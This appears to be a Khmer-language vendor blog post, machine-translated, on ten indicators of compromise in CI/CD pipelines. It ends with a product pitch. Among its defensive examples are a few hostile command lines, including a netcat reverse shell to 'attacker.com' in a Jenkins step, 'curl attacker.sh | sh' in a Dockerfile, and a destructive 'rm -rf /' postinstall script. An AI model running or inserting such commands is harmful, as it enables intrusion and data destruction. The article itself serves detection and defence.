សូចនាករកំពូលទាំង ១០ នៃការសម្របសម្រួលក្នុង CI/CD Pipelines

​មាតិកា

ប្រកាសដែលត្រូវតែអាន

ប្រកាសថ្មីៗបំផុតដែលគួរឱ្យចាប់អារម្មណ៍

សេចក្តីផ្តើម៖ តើសូចនាករនៃការសម្របសម្រួលក្នុងសន្តិសុខតាមអ៊ីនធឺណិតមានអ្វីខ្លះ?

សូចនាករនៃការសម្របសម្រួលគឺជាសញ្ញាព្រមានដំបូងដែលបង្ហាញថាប្រព័ន្ធរបស់អ្នក ឬ pipeline អាច​នឹង​ត្រូវ​បាន​វាយប្រហារ។ និយាយ​ឲ្យ​សាមញ្ញ​ទៅ សូចនាករនៃការសម្របសម្រួល គឺជាស្លាកស្នាមដែលបន្សល់ទុកដោយអ្នកវាយប្រហារ ដូចជាចម្លែកៗ logins, ការផ្លាស់ប្តូរឯកសារ ឬមេរោគដែលលាក់។ នៅក្នុង សន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOCពួកវាដើរតួដូចជាស្នាមម្រាមដៃនៅកន្លែងកើតហេតុ ដោយផ្តល់ឱ្យអ្នកនូវភស្តុតាងច្បាស់លាស់ថាមានអ្វីមួយខុស។ ដូច្នេះ នៅពេលដែលអ្នកអភិវឌ្ឍន៍សួរ តើអ្វីជាសូចនាករនៃការសម្របសម្រួលចម្លើយមិនត្រឹមតែកំណត់ចំពោះម៉ាស៊ីនមេ ឬជញ្ជាំងភ្លើងប៉ុណ្ណោះទេ វាក៏រួមបញ្ចូលទាំងហានិភ័យដែលលាក់ទុកនៅក្នុងសម័យទំនើបផងដែរ។ CI/CD pipelines.

នៅក្នុងទាំងនេះ pipelines អ្នកវាយប្រហារអាចកែប្រែកូដ បញ្ចូលការពឹងផ្អែកដែលមានគំនិតអាក្រក់ ឬផ្លាស់ប្តូរជំហានបង្កើតដោយមិនត្រូវបានកត់សម្គាល់។ ទោះជាយ៉ាងណាក៏ដោយ មគ្គុទ្ទេសក៍ភាគច្រើននៅតែផ្តោតតែលើម៉ាស៊ីនមេ ឬបណ្តាញប៉ុណ្ណោះ។ ជាលទ្ធផល ខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធីបានក្លាយជាគោលដៅងាយស្រួលបំផុតមួយ។

នោះហើយជាមូលហេតុដែលការស្វែងរកសូចនាករនៃការសម្របសម្រួលនៅក្នុង CI/CD pipelines គឺមានសារៈសំខាន់។ លើសពីនេះទៅទៀត វាជួយក្រុមនានាទប់ស្កាត់មេរោគ ការពារអាថ៌កំបាំង និងធានាសុវត្ថិភាពគ្រប់ជំហាននៃការចែកចាយកម្មវិធី។

សូចនាករកំពូលទាំង ១០ នៃការសម្របសម្រួលក្នុង CI/CD Pipelines

នៅពេលពន្យល់ពីសូចនាករនៃការសម្របសម្រួល បញ្ជីភាគច្រើនផ្តោតលើម៉ាស៊ីនមេ ឬបណ្តាញ។ យ៉ាងណាក៏ដោយ CI/CD pipelines អ្នកវាយប្រហារបន្សល់ទុកស្នាមម្រាមដៃខុសៗគ្នា។ ការទទួលស្គាល់សញ្ញាទាំងនេះគឺមានសារៈសំខាន់សម្រាប់ការការពារជាមុន។ ខាងក្រោមនេះគឺជាសញ្ញាសម្គាល់ចំនួន 10 របស់ IOC អំពីសន្តិសុខតាមអ៊ីនធឺណិត ដែលអ្នកអភិវឌ្ឍន៍ និងវិស្វករសន្តិសុខគ្រប់រូបគួរតែតាមដាន។

១. ការផ្លាស់ប្តូរការពឹងផ្អែកគួរឱ្យសង្ស័យ

សូចនាករសំខាន់មួយនៃការសម្របសម្រួលនៅក្នុង pipelines គឺជាការអាប់ដេតភាពអាស្រ័យភ្លាមៗ និងចម្លែក។ អ្នកវាយប្រហារច្រើនតែប្រើអ្នកអភិវឌ្ឍន៍ទំនុកចិត្តដែលដាក់ក្នុងកម្មវិធីគ្រប់គ្រងកញ្ចប់ដើម្បីបន្ថែមកញ្ចប់ដ៏គ្រោះថ្នាក់។

ឧទាហរណ៍ ក្នុង npm a package.json ភាពខុសគ្នាភ្លាមៗអាចរួមមាន៖

ការផ្លាស់ប្តូរបែបនេះអាចមើលទៅមានសុវត្ថិភាព ប៉ុន្តែអាចចាក់បញ្ចូលកូដដែលមានមេរោគ Trojan ទៅក្នុងគ្រប់ build ទាំងអស់។

ផលប៉ះពាល់: ការបង្កើតដែលរងការសម្របសម្រួលទទួលមរតកមេរោគនៅប្រភព។

ការរកឃើញ៖ អនុវត្តការពិនិត្យឡើងវិញអំពីការពឹងផ្អែក តាមដានភាពខុសគ្នានៃឯកសារចាក់សោ និងស្កេនកញ្ចប់ថ្មីៗគ្រប់ពេល។

2. កូដ​ដែល​បាន​បិទបាំង​ក្នុង​ការ​បង្កើត​កម្មវិធី 

អ្នកនិពន្ធមេរោគពឹងផ្អែកលើការបិទបាំងដើម្បីរំលងការពិនិត្យឡើងវិញ។ ជាលទ្ធផល សូចនាករនៃការសម្របសម្រួលនេះនៅក្នុង CI/CD pipelines អាចជា​ផ្នែក​មួយ​ដែលពិបាកចាប់បំផុត។ តាមពិតទៅ payloads ដែល​ត្រូវបាន​បិទបាំង​ជារឿយៗ​រអិលចូលទៅក្នុងបណ្ណាល័យប្រភពបើកចំហ ឬរូបភាពកុងតឺន័រដោយមិនមានការជូនដំណឹង។

ឧទាហរណ៍:

  • កញ្ចប់ PyPI ដោយប្រើ base64.b64decode("cHJpbnQoSGFja2VkKQ==").
  • រូបភាព Docker ដែលពោរពេញទៅដោយប្រព័ន្ធគោលពីរ UPX ដែលមិនចាំបាច់។
  • JavaScript ពោរពេញដោយ \x41\x42 រត់គេចខ្លួនដោយលាក់ខ្លួនពីអ្នកលួចអត្តសញ្ញាណប័ណ្ណ។

ផលប៉ះពាល់: កូដដែលលាក់ទុកដំណើរការដោយស្ងៀមស្ងាត់ក្នុងអំឡុងពេលបង្កើត ឬពេលដំណើរការ ដែលធ្វើឱ្យនេះជាសញ្ញាសំខាន់មួយនៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC។
ការរកឃើញ៖ ផ្សំ SAST ជាមួយនឹងការស្កេនមេរោគ ដើម្បីសម្គាល់កូដដែលបានអ៊ិនកូដ ឬកូដដែលបានវេចខ្ចប់។ លើសពីនេះទៅទៀត សូមចាត់ទុកការបិទបាំងជាសញ្ញាគ្រោះថ្នាក់ដែលសមនឹងទទួលបានការស៊ើបអង្កេតបន្ថែមទៀត។

៣. អាថ៌កំបាំងដែលត្រូវបានលាតត្រដាងនៅក្នុង Git៖ ហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិត IOC បុរាណ

CI/CD pipelineជារឿយៗ s ទទួលមរតកអាថ៌កំបាំងដោយផ្ទាល់ពីឃ្លាំង។ ទោះជាយ៉ាងណាក៏ដោយ នៅពេលដែលអាថ៌កំបាំងលេចឡើងនៅក្នុង Gitពួកគេក្លាយជាចម្លើយច្បាស់លាស់បំផុតមួយចំពោះសំណួរថា "តើអ្វីទៅជាសូចនាករនៃការសម្របសម្រួលនៅក្នុង pipelines?” នៅពេលដែលព័ត៌មានសម្ងាត់ចុះចតនៅក្នុង Git អ្នកវាយប្រហារអាចកេងប្រវ័ញ្ចពួកវាដោយគ្មានកំណត់។

ឧទាហរណ៍:

  • A .env ឯកសារដែលមាន AWS_SECRET_KEY=.
  • ថូខឹនត្រូវបានរុញចូល config.json.
  • អាថ៌កំបាំងនៅតែអាចមើលឃើញនៅក្នុងប្រវត្តិ Git សូម្បីតែបន្ទាប់ពីដកចេញក៏ដោយ។

ផលប៉ះពាល់: កូនសោដែលលាតត្រដាងផ្តល់ឱ្យអ្នកវាយប្រហារនូវសិទ្ធិចូលប្រើដោយផ្ទាល់ទៅកាន់ CI/CD pipelineប្រព័ន្ធពពក ឬមូលដ្ឋានទិន្នន័យ។ ដូច្នេះ នេះគឺជាសូចនាករមួយក្នុងចំណោមសូចនាករដ៏គ្រោះថ្នាក់បំផុតនៃការសម្របសម្រួល។
ការរកឃើញ៖ ការប្រើ pre-commit hooks និងការងារ CI សម្រាប់ការស្កេនសម្ងាត់ ហើយដកហូតសោដែលលេចធ្លាយភ្លាមៗ។ លើសពីនេះ អនុវត្តការកែតម្រូវដោយស្វ័យប្រវត្តិ ដើម្បីកាត់បន្ថយបង្អួចដែលប៉ះពាល់។

៤. មានការក្លែងបន្លំ Pipeline ការកំណត់រចនាសម្ព័ន្ធ៖ សូចនាករលាក់កំបាំងនៃការសម្របសម្រួល

Pipeline ការកំណត់រចនាសម្ព័ន្ធគឺជាគោលដៅតម្លៃខ្ពស់ពីព្រោះ ការកែប្រែតែមួយជារឿយៗធ្វើឱ្យខូចដំណើរការការងារទាំងមូល។ ជាលទ្ធផល ត្រូវបានក្លែងបន្លំ pipeline ឯកសារទាំងនោះគឺជាហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិតដ៏សំខាន់របស់ IOC ដែលឧបករណ៍ត្រួតពិនិត្យបែបប្រពៃណីកម្ររកឃើញណាស់។

ឧទាហរណ៍:

  • នៅក្នុង GitHub សកម្មភាព៖

  • នៅក្នុង GitLab៖ ការងារព្យាបាទមួយត្រូវបានបន្ថែមទៅ .gitlab-ci.yml ដែល​បោះចោល​ទិន្នន័យ​រសើប។
  • នៅ Jenkins៖ sh "nc -e /bin/bash attacker.com 4444".

ផលប៉ះពាល់: ការផ្លាស់ប្តូរដែលមិនត្រូវបានអនុម័តទាំងនេះធ្វើឱ្យអ្នក pipeline ចូលទៅក្នុងទ្វារក្រោយអចិន្ត្រៃយ៍សម្រាប់អ្នកវាយប្រហារ ដែលច្បាស់ជារាប់ជាសូចនាករនៃការសម្របសម្រួល។
ការរកឃើញ៖ អនុវត្តការកំណត់រចនាសម្ព័ន្ធដែលបានចុះហត្ថលេខា តម្រូវឱ្យមានការយល់ព្រមពី PR និងតាមដានការងារដែលមិនបានរំពឹងទុក។ លើសពីនេះ សូមកំណត់ guardrails ដែលរារាំងលំហូរការងារដែលបានផ្លាស់ប្តូរដោយស្វ័យប្រវត្តិ។

5. ឯកសិទ្ធិ IaC លំនាំដើម 

ការកំណត់រចនាសម្ព័ន្ធដែលត្រូវបានកំណត់រចនាសម្ព័ន្ធមិនត្រឹមត្រូវជារឿយៗបង្កើតទ្វារក្រោយដែលលាក់។ ជាលទ្ធផល លំនាំដើមដែលមានសិទ្ធិនៅក្នុង IaC គឺជាហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC បុរាណ។

ឧទាហរណ៍:

  • ផតផ្តល់សិទ្ធិដាក់ពង្រាយ Kubernetes privileged: true.
  • តារាង Helm បង្ហាញសេវាកម្មជាមួយ 0.0.0.0:22.

ផលប៉ះពាល់: អ្នកវាយប្រហារទទួលបានសិទ្ធិចូលប្រើកម្រិត root ឬបង្ហាញសេវាកម្មផ្ទៃក្នុងជាសាធារណៈ។ ជាលទ្ធផល បញ្ហាទាំងនេះពង្រីកវិសាលភាពនៃការវាយប្រហារយ៉ាងខ្លាំង។
ការរកឃើញ៖ Apply IaC ការស្កេនដើម្បីអនុវត្តសិទ្ធិតិចតួចបំផុតមុនពេលបញ្ចូលគ្នា។ លើសពីនេះ ត្រូវប្រាកដថាការកំណត់រចនាសម្ព័ន្ធនីមួយៗត្រូវបានពិនិត្យឡើងវិញជាផ្នែកមួយនៃ pipeline.

៦. ឥរិយាបថសាងសង់មិនធម្មតា 

អ្នកវាយប្រហារច្រើនតែផ្លាស់ប្តូរ pipeline ឥរិយាបថ​ដើម្បី​រអិល​ចូល​ក្នុង​សកម្មភាព​ព្យាបាទ។ ម្យ៉ាង​ទៀត សកម្មភាព​សាងសង់​មិន​ធម្មតា​គឺជា​ចម្លើយ​ច្បាស់លាស់​បំផុត​មួយ​ចំពោះ​អ្វី​ដែល​ជា​សូចនាករ​នៃ​ការ​សម្របសម្រួល​ក្នុង CI/CD pipelines.

ឧទាហរណ៍:

  • Builds កំពុងធ្វើការស្នើសុំបណ្តាញទៅកាន់ដែនចម្លែកៗ។
  • គម្រោង Node.js មួយ​ស្រាប់តែ​បង្កើត PowerShell អំឡុងពេល npm install.
  • ការងារ CI កំពុងទាញយកឯកសារគោលពីរធំៗដែលមិនបានកំណត់នៅក្នុងស្គ្រីបបង្កើត។

ផលប៉ះពាល់: ការបង្កើតដែលរងការគំរាមកំហែងអាចដើរតួជាចំណុចចែកចាយមេរោគ។ លើសពីនេះទៅទៀត ពួកវារីករាលដាលបន្ទុកផ្ទុកមេរោគនៅទូទាំងការដាក់ពង្រាយនីមួយៗ។
ការរកឃើញ៖ តាមដានកំណត់ហេតុបង្កើតសម្រាប់ដំណើរការ ឬការតភ្ជាប់ដែលមិនបានរំពឹងទុក។ លើសពីនេះ សូមកំណត់រចនាសម្ព័ន្ធការរកឃើញភាពមិនប្រក្រតីដើម្បីសម្គាល់ឥរិយាបថនៅខាងក្រៅបទដ្ឋាន។

៧. ស្គ្រីបកញ្ចប់ព្យាបាទជាហានិភ័យសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC

កម្មវិធីគ្រប់គ្រងកញ្ចប់គាំទ្រវដ្តជីវិត hooks ដែលអ្នកវាយប្រហារកេងប្រវ័ញ្ច។ ដូច្នេះ ស្គ្រីបព្យាបាទនៅក្នុង npm, PyPI ឬ Dockerfiles គឺជាសូចនាករដ៏រឹងមាំនៃការសម្របសម្រួល។

ឧទាហរណ៍:

  • npm៖ postinstall កំពុងដំណើរការស្គ្រីប rm -rf / ឬ​ជា​សញ្ញា​ទៅ C2។
  • PyPI៖ setup.py ការប្រតិបត្តិកូដ Python ដែលលាក់នៅពេលដំឡើង។
  • ឯកសារ Docker៖ RUN curl attacker.sh | sh.

ផលប៉ះពាល់: ការវាយប្រហារនេះដំណើរការកំឡុងពេលដំឡើង មុនពេលការធ្វើតេស្តពេលដំណើរការណាមួយ។ ជាលទ្ធផល អ្នកអភិវឌ្ឍន៍អាចនឹងមិនដែលកត់សម្គាល់រហូតដល់វាយឺតពេល។
ការរកឃើញ៖ ស្កេន​កម្មវិធី​បង្ហាញ​កញ្ចប់​សម្រាប់​ស្គ្រីប​ដំឡើង។ លើស​ពី​នេះ សូម​ដាក់​កម្រិត​ហានិភ័យ hooks in CI/CD ការងារដើម្បីកាត់បន្ថយការប៉ះពាល់។

៨. សូចនាករនៃការបំពុលបញ្ជីឈ្មោះនៃការសម្របសម្រួល

អ្នកវាយប្រហារជំនួស ឬកែប្រែវត្ថុបុរាណនៅក្នុងបញ្ជីឈ្មោះ ហើយព្រឹត្តិការណ៍ទាំងនេះគឺជាឧទាហរណ៍សៀវភៅសិក្សាអំពីអ្វីដែលជាសូចនាករនៃការសម្របសម្រួលនៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់។ pipelines.

ឧទាហរណ៍:

  • ស្លាករូបភាព Docker ត្រូវបានធ្វើបច្ចុប្បន្នភាពដោយស្ងៀមស្ងាត់ជាមួយនឹងស្រទាប់ដែលមានមេរោគ Trojanized។
  • កញ្ចប់ខាងក្នុងត្រូវបានជំនួសដោយកំណែដែលមានជាតិពុល។
  • ការអង្គុយលើលំហឈ្មោះ npm ដូចជា lodash-proxy.

ផលប៉ះពាល់: រាល់ការបង្កើតដែលប្រើប្រាស់ registry artifact នឹងត្រូវបានវាយប្រហារ។ មិនត្រឹមតែប៉ុណ្ណោះទេ ការគំរាមកំហែងនេះរីករាលដាលដល់សេវាកម្មខាងក្រោម។
ការរកឃើញ៖ អនុវត្តការត្រួតពិនិត្យហត្ថលេខា និងភាពសុចរិតលើការទាញយកបញ្ជីឈ្មោះទាំងអស់។ លើសពីនេះ តាមដានប្រភពដើមនៃវត្ថុបុរាណជាមួយ SBOM សុពលភាព។

៩. សកម្មភាពអ្នកប្រើប្រាស់មិនប្រក្រតីជាភស្តុតាងរបស់ IOC

គណនី​ដែល​រង​ការ​លួច​ចូល​ស្ទើរតែ​តែងតែ​បន្សល់​ទុក​នូវ​ស្លាកស្នាម​មិន​ប្រក្រតី។ ដូច្នេះហើយ ឥរិយាបថមិនធម្មតារបស់អ្នកអភិវឌ្ឍន៍គឺជាសូចនាករដ៏រឹងមាំនៃការសម្របសម្រួល។

ឧទាហរណ៍:

  • Commitបានរុញនៅម៉ោង ៣ ទៀបភ្លឺ ម៉ោងក្នុងស្រុក។
  • ការអនុម័ត PR ដោយគណនីនៅវិស្សមកាល។
  • Pipelines ត្រូវបានបង្កឡើងដោយភាពញឹកញាប់មិនធម្មតា។

ផលប៉ះពាល់: អ្នកវាយប្រហារប្រើប្រាស់ព័ត៌មានសម្ងាត់ដែលត្រូវបានលួច ដើម្បីបញ្ចូលការផ្លាស់ប្តូរដែលមានគំនិតអាក្រក់។ យ៉ាងណាមិញ ការមិនអនុញ្ញាត commitលាយបញ្ចូលគ្នាយ៉ាងងាយស្រួលទៅក្នុងលំហូរការងារធម្មតា។
ការរកឃើញ៖ កម្មវិធីត្រួតពិនិត្យ SCM សកម្មភាពសម្រាប់ភាពមិនប្រក្រតី អនុវត្ត MFA និងបង្វិលសញ្ញាសម្ងាត់ជាប្រចាំ។ លើសពីនេះ ត្រូវប្រុងប្រយ័ត្នចំពោះភាពគួរឱ្យសង្ស័យ commit ឬគំរូនៃការអនុម័ត។

១០. ការត្រួតពិនិត្យភាពសុចរិត ឬហត្ថលេខាបានបរាជ័យនៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC

ជារឿងធម្មតា ប៉ុន្តែត្រូវបានមើលរំលង សូចនាករនៃការសម្របសម្រួល គឺជាការត្រួតពិនិត្យភាពសុចរិត ឬហត្ថលេខាដែលបរាជ័យ។ នៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិតរបស់ IOC ការត្រួតពិនិត្យទាំងនេះផ្ទៀងផ្ទាត់ថាកូដ ឬវត្ថុបុរាណមានភាពត្រឹមត្រូវ។ ការរំលងពួកវានឹងបន្សល់ទុក pipelines លាតត្រដាង។

ឧទាហរណ៍:

  • ហាស SHA256 មិនត្រូវគ្នានឹង checksum ដែលរំពឹងទុកទេ។
  • ហត្ថលេខា GPG បាត់ ឬមិនត្រឹមត្រូវ។
  • An SBOM បង្ហាញ​វត្ថុបុរាណ​ដែល​មិន​ទាន់​ចុះហត្ថលេខា។

ផលប៉ះពាល់: ការបរាជ័យនៃភាពសុចរិតជារឿយៗមានន័យថាការក្លែងបន្លំ ការបំពុលបញ្ជីឈ្មោះ ឬការចាក់មេរោគ។

ការរកឃើញ៖ ធ្វើឱ្យការត្រួតពិនិត្យហត្ថលេខាដោយស្វ័យប្រវត្តិ អនុវត្តការផ្ទៀងផ្ទាត់ checksum និងរារាំងសមាសធាតុដែលមិនទាន់ចុះហត្ថលេខា។ លើសពីនេះទៅទៀត សូមចាត់ទុកការត្រួតពិនិត្យដែលបរាជ័យនីមួយៗជាភស្តុតាងច្បាស់លាស់នៃការសម្របសម្រួល។

CI/CD សូចនាករនៃការសម្របសម្រួលដោយសង្ខេប

សូចនាករនៃការសម្របសម្រួល (IOC) ផលប៉ះពាល់នៅក្នុង CI/CD Pipelines របៀបកំណត់
ការផ្លាស់ប្តូរការពឹងផ្អែកគួរឱ្យសង្ស័យ អ្នកវាយប្រហារបញ្ចូលបណ្ណាល័យព្យាបាទទៅក្នុងកម្មវិធីគ្រប់គ្រងកញ្ចប់ ដែលនាំឱ្យមានការបង្កើតដែលរងការគំរាមកំហែង។ តាមដានភាពខុសគ្នានៃឯកសារចាក់សោ អនុវត្តការពិនិត្យឡើងវិញអំពីការពឹងផ្អែក និងស្កេនការពឹងផ្អែកជាបន្តបន្ទាប់។
កូដ​ដែល​បាន​បិទបាំង​ក្នុង​ការ​បង្កើត​ថ្មី បន្ទុកផ្ទុកទិន្នន័យដែលលាក់ទុកដំណើរការកំឡុងពេលសាងសង់ ឬពេលដំណើរការដោយគ្មានការរកឃើញ។ ការប្រើ SAST និងការស្កេនមេរោគដើម្បីសម្គាល់លំនាំកូដ base64, hex ឬ packed។
អាថ៌កំបាំងត្រូវបានបង្ហាញនៅក្នុង Git ថូខឹន ឬសោ API ដែលលេចធ្លាយផ្តល់ឱ្យអ្នកវាយប្រហារនូវសិទ្ធិចូលប្រើដោយផ្ទាល់ទៅកាន់ប្រព័ន្ធសំខាន់ៗ។ ដំណើរការការស្កេនសម្ងាត់នៅក្នុង Git hooks និងលុបចោលព័ត៌មានសម្ងាត់ដែលលេចធ្លាយដោយស្វ័យប្រវត្តិ។
មានការក្លែងបន្លំ Pipeline Configurations លំហូរការងារដែលបានកែប្រែអនុញ្ញាតឱ្យមានការលួចចូលទិន្នន័យ ឬការរក្សាទុកទិន្នន័យនៅខាងក្នុង CI/CD. តម្រូវឱ្យមានការយល់ព្រមពី PR អនុវត្តការកំណត់រចនាសម្ព័ន្ធដែលបានចុះហត្ថលេខា និងតាមដាន pipeline ការផ្លាស់ប្តូរ។
ឯកសិទ្ធិ។ IaC លំនាំដើម តួនាទីដែលអនុញ្ញាតហួសហេតុពេក ឬលំនាំដើមដែលមិនមានសុវត្ថិភាពបង្ហាញបរិស្ថានពពក។ ស្កេនឯកសារ Terraform, Kubernetes និង Helm សម្រាប់ការអនុវត្តសិទ្ធិតិចបំផុត។
ឥរិយាបថសាងសង់មិនធម្មតា Pipelineត្រូវបានប្រើជាចំណុចចែកចាយមេរោគ ឬសម្រាប់ចលនាចំហៀង។ វិភាគកំណត់ហេតុបង្កើតសម្រាប់ការទាញយក ដំណើរការ ឬការហៅចេញដែលមិនបានរំពឹងទុក។
ស្គ្រីបកញ្ចប់ព្យាបាទ ស្គ្រីបមុន/ក្រោយការដំឡើងដែលលាក់នឹងបង្កឱ្យមានការផ្ទុកទិន្នន័យមុនពេលធ្វើតេស្តពេលដំណើរការ។ រារាំងស្គ្រីប npm/PyPI ដែលមានហានិភ័យ និងដាក់កម្រិតការប្រតិបត្តិនៅក្នុង CI/CD ការងារ។
ការពុលបញ្ជីឈ្មោះ វត្ថុបុរាណ Trojanized ជំនួសរូបភាព ឬប្រព័ន្ធគោលពីរដែលគួរឱ្យទុកចិត្តនៅក្នុងបញ្ជីឈ្មោះ។ ផ្ទៀងផ្ទាត់ checksums អនុវត្តការផ្ទៀងផ្ទាត់ហត្ថលេខា និងស្កេនបញ្ជីឈ្មោះដោយសកម្ម។
សកម្មភាពអ្នកប្រើប្រាស់មិនប្រក្រតី គណនីដែលរងការលួចចូលជំរុញឱ្យមានមេរោគ commits ឬ គន្លឹះ pipelines. អនុវត្ត MFA ត្រួតពិនិត្យ commitសម្រាប់ភាពមិនប្រក្រតី និងវិភាគ login លំនាំ។
ការត្រួតពិនិត្យភាពសុចរិត ឬហត្ថលេខាបានបរាជ័យ បង្ហាញពីកូដ ការពឹងផ្អែក ឬរូបភាពដែលត្រូវបានកែប្រែដែលចូលទៅក្នុង pipeline. ស្វ័យប្រវត្តិកម្មការត្រួតពិនិត្យភាពសុចរិត និងរារាំងសមាសធាតុដែលមិនបានចុះហត្ថលេខា ឬមិនត្រូវគ្នា។

ហេតុអ្វីបានជាសន្តិសុខតាមអ៊ីនធឺណិត IOC បែបប្រពៃណីខកខាន CI/CD ហានិភ័យ

អង្គការភាគច្រើនត្រួតពិនិត្យសូចនាករនៃការសម្របសម្រួលនៅលើម៉ាស៊ីនមេ កុំព្យូទ័រ ឬបណ្តាញរួចហើយ។ ទោះជាយ៉ាងណាក៏ដោយ វិធីសាស្រ្តបុរាណនេះចំពោះសន្តិសុខតាមអ៊ីនធឺណិត IOC មិនអើពើនឹង CI/CD pipelines ដែលឥឡូវនេះជាផ្ទៃវាយប្រហារដ៏សំខាន់បំផុតមួយ។ តាមពិតទៅ pipelineបង្ហាញសញ្ញាសម្របសម្រួលតែមួយគត់ដែលឧបករណ៍ប្រពៃណីមិនអាចរកឃើញ។

សូចនាករនៃការសម្របសម្រួលក្នុងសន្តិសុខប្រពៃណី

នៅក្នុងសន្តិសុខតាមអ៊ីនធឺណិត IOC ធម្មតា ការផ្តោតអារម្មណ៍ជាធម្មតាគឺទៅលើ៖

  • មិនធម្មតា loginឬអាសយដ្ឋាន IP ដែលបង្ហាញពីព័ត៌មានសម្ងាត់ដែលត្រូវបានគេលួច។
  • ការ​ផ្លាស់ប្ដូរ​ហាស​ឯកសារ ឬ​ការ​ផ្លាស់ប្ដូរ​បញ្ជី​ឈ្មោះ​គួរ​ឲ្យ​សង្ស័យ​ដែល​បង្ហាញ​ពី​មេរោគ។
  • ចរាចរណ៍ចេញដែលមិននឹកស្មានដល់ដែលចង្អុលទៅការលួចទិន្នន័យ។

ទាំងនេះគឺជាសូចនាករល្បីឈ្មោះដែលក៏ត្រូវបានតាមដាននៅក្នុង ក្របខ័ណ្ឌ MITER ATT&CKដែលគូសផែនទីឥរិយាបថ និងយុទ្ធសាស្ត្រទូទៅរបស់សត្រូវ។ ទាំងនេះគឺជាសញ្ញាមានប្រយោជន៍។ ទោះជាយ៉ាងណាក៏ដោយ ពួកវាអនុវត្តជាចម្បងចំពោះប្រព័ន្ធប្រតិបត្តិការ ឬបណ្តាញសាជីវកម្ម។ ជាលទ្ធផល ពួកវាខកខានការក្លែងបន្លំដ៏ស្រទន់ដែលកើតឡើងមុននេះនៅក្នុងខ្សែសង្វាក់ផ្គត់ផ្គង់កម្មវិធី។

ហេតុអ្វី CI/CD Pipelines មានភាពខុសគ្នា

CI/CD pipelines គឺជាបរិស្ថានស្វ័យប្រវត្តិដែលអ្នកអភិវឌ្ឍន៍ commit កូដ ការទាញយកភាពអាស្រ័យ និងការចេញផ្សាយ builds។ អ្នកវាយប្រហារដឹងថាការសម្របសម្រួលមួយនៅទីនេះកើតឡើងជាបន្តបន្ទាប់នៅទូទាំងការដាក់ពង្រាយនីមួយៗ។ ដូច្នេះ តើអ្វីជាសូចនាករនៃការសម្របសម្រួលនៅក្នុង CI/CD pipelineពួកវាមើលទៅខុសគ្នាខ្លាំងណាស់៖

  • ការពឹងផ្អែកព្យាបាទមួយត្រូវបានបន្ថែមដោយស្ងាត់ៗទៅក្នុង package.json ឬ requirements.txt។
  • កូនសោ API ឬថូខឹនត្រូវបានបង្ហាញនៅក្នុង Git commitឯកសារ s ឬ .env។
  • កូដ​ដែល​បាន​បិទបាំង​ត្រូវ​បាន​ចាក់​ចូល​ទៅ​ក្នុង​កញ្ចប់ npm ឬ PyPI។
  • ឯកសារ Terraform ឬ Kubernetes ដែលមានលំនាំដើមមិនមានសុវត្ថិភាពដូចជា privileged: true។
  • Pipeline ការងារ​ដែល​ត្រូវ​បាន​កែសម្រួល​ដើម្បី​ច្រោះ​ទិន្នន័យ ឬ​បើក​ទ្វារ​ខាងក្រោយ។

សញ្ញាសម្របសម្រួលទាំងនេះនៅក្នុង CI/CD នៅតែមើលមិនឃើញ standard ឧបករណ៍សុវត្ថិភាព។

គម្លាត​នៃ​សន្តិសុខ​តាម​អ៊ីនធឺណិត​របស់ IOC

ទោះបីជាក្រុមជាច្រើនយល់ពីតម្លៃនៃសូចនាករនៃការសម្របសម្រួលក៏ដោយ ពួកគេនៅតែពឹងផ្អែកតែលើការរកឃើញពីម៉ាស៊ីនមេ និងកំណត់ហេតុបណ្តាញប៉ុណ្ណោះ។ ដូច្នេះ អ្នកវាយប្រហារអាចបំពុលការបង្កើត ឬបញ្ចូលមេរោគដោយមិនបន្សល់ទុកដានធម្មតា។ នេះជាមូលហេតុដែលឧប្បត្តិហេតុដូចជាទ្វារក្រោយ XZ Utils ឬកញ្ចប់ npm ព្យាបាទមិនត្រូវបានរកឃើញរហូតដល់ពួកវាឈានដល់ការផលិត។

ការសម្របសម្រួលខ្សែសង្វាក់ផ្គត់ផ្គង់ប្រភេទនេះក៏ត្រូវបានគូសបញ្ជាក់ដោយ CISការណែនាំអំពីសុវត្ថិភាពខ្សែសង្វាក់ផ្គត់ផ្គង់របស់ Aដែលព្រមានថា អ្នកវាយប្រហារកំពុងកំណត់គោលដៅកាន់តែខ្លាំងឡើង CI/CD pipelines និងបញ្ជីឈ្មោះ។

Takeaway នេះ

សន្តិសុខតាមអ៊ីនធឺណិតបែបប្រពៃណីរបស់ IOC គឺចាំបាច់ ប៉ុន្តែមិនគ្រប់គ្រាន់ទេ។ លើសពីនេះទៅទៀត ក្រុមនានាត្រូវតែទទួលស្គាល់សូចនាករនៃការសម្របសម្រួលជាក់លាក់ចំពោះ CI/CD pipelines. មានតែពេលនោះទេដែលពួកគេអាចរកឃើញកូដព្យាបាទ ឬ pipeline ការរំលោភបំពានមុនពេលវារីករាលដាលពាសពេញបរិស្ថាន។

ឧបករណ៍វិភាគសមាសភាពកម្មវិធី sca
ផ្តល់អាទិភាព ដោះស្រាយ និងធានាសុវត្ថិភាពហានិភ័យផ្នែកទន់របស់អ្នក
ទទួលបានគណនីឥតគិតថ្លៃរបស់អ្នក។
មិនតម្រូវឱ្យមានកាតឥណទានទេ។

ធានាសុវត្ថិភាពនៃការអភិវឌ្ឍន៍ និងការដឹកជញ្ជូនកម្មវិធីរបស់អ្នក

ជាមួយឈុតផលិតផល Xygeni